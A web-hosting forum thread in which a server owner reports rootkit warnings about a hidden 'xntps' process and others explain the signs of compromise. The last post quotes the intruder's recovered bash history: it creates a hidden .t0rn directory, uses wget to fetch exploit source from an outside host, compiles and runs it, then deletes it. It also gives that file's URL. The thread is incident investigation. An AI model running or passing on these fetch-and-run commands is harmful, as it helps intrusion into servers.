Jump to content

Nightly Trojan Horse Warnings?

snipe

By snipe
in Security Discussions

 Share

Recommended Posts

snipe Community Regular

snipe

Posted
Posted

I have been getting trojan horse warnings for the last few days. The message I get is:

 

Hidden Pid detected! [pid 21736]

hidden from ps: [yes]

binary location: [/usr/sbin/xntps]

 

When I do a manual scan for trojan horses through WHM, this is what I get:

 

Appears Clean

 

/dev/core

/dev/srd0

/dev/stderr

 

 

 

Scanning for Trojan Horses.....

.

.

 

Possible Trojan - /sbin/syslogd

MikeJ Veteran

MikeJ

Posted
Posted

Is this on a dedicated server? It sounds like you might possibly have had a rootkit installed on your server (that is you may have been hacked). Hidden from ps means that when you do a 'ps' command to list processes, that process doesn't show up. This is a common technique used by root kits... they'll either replace your ps binary, or load a kernel module (or both), to hide their processes and files. 'xntps' is a binary that is often used to install a backdoor.

 

If you see something like the following at the end of /etc/rc.d/rc.sysinit:

># Xntps (NTPv3 daemon) startup..

/usr/sbin/xntps -q

...then it is pretty definite you have been rooted.

 

Unless you really know what you are doing, you should send in a support ticket to have TCH staff take a look at your server. If your server is fully managed, they should take care of it. If not, they may take care of it for a charge. There's not really a magical "do this one thing" to get rid of a rootkit and whatever else they may have left behind, especially if they loaded a kernel module (you either need to remove, or negate that module before you can really find everything).

 

I'm gonna move this discussion to Security as well, as it's more relative.

MikeJ Veteran

MikeJ

Posted
Posted

Oh, and btw, if you are managing your own server.... make sure you have updated your cPanel within the last two weeks, because that may be how you got rooted in the first place (if indeed you did) if you haven't updated it.

 

From a root shell, just run /scripts/upcp to make sure you are up to date.

snipe Community Regular

snipe

Posted
  • Author
Posted

Well - I spent a little time screwing around, and I think we've backtracked their steps. Once we changed ls to actually show us the the truth (after they had changed it to lie), we backtracked their bash history, and lookee loo what we found...

 

>cd /dev/shm
mkdir .t0rn
cd .t0rn
ls
uname -a
wget nu.gs/~dragnet/checkint.c
make checkint.c
make checkint
./checkint
rm *checkint*
exit

 

They left the script they used wget to grab on the webserver:

 

http://nu.gs/~dragnet/checkint.c

 

I think its time to open that trouble ticket... lol

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Unfortunately, your content contains terms that we do not allow. Please edit your content to remove the highlighted words below.
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
 Share
Go to topic listing
×
×
  • Create New...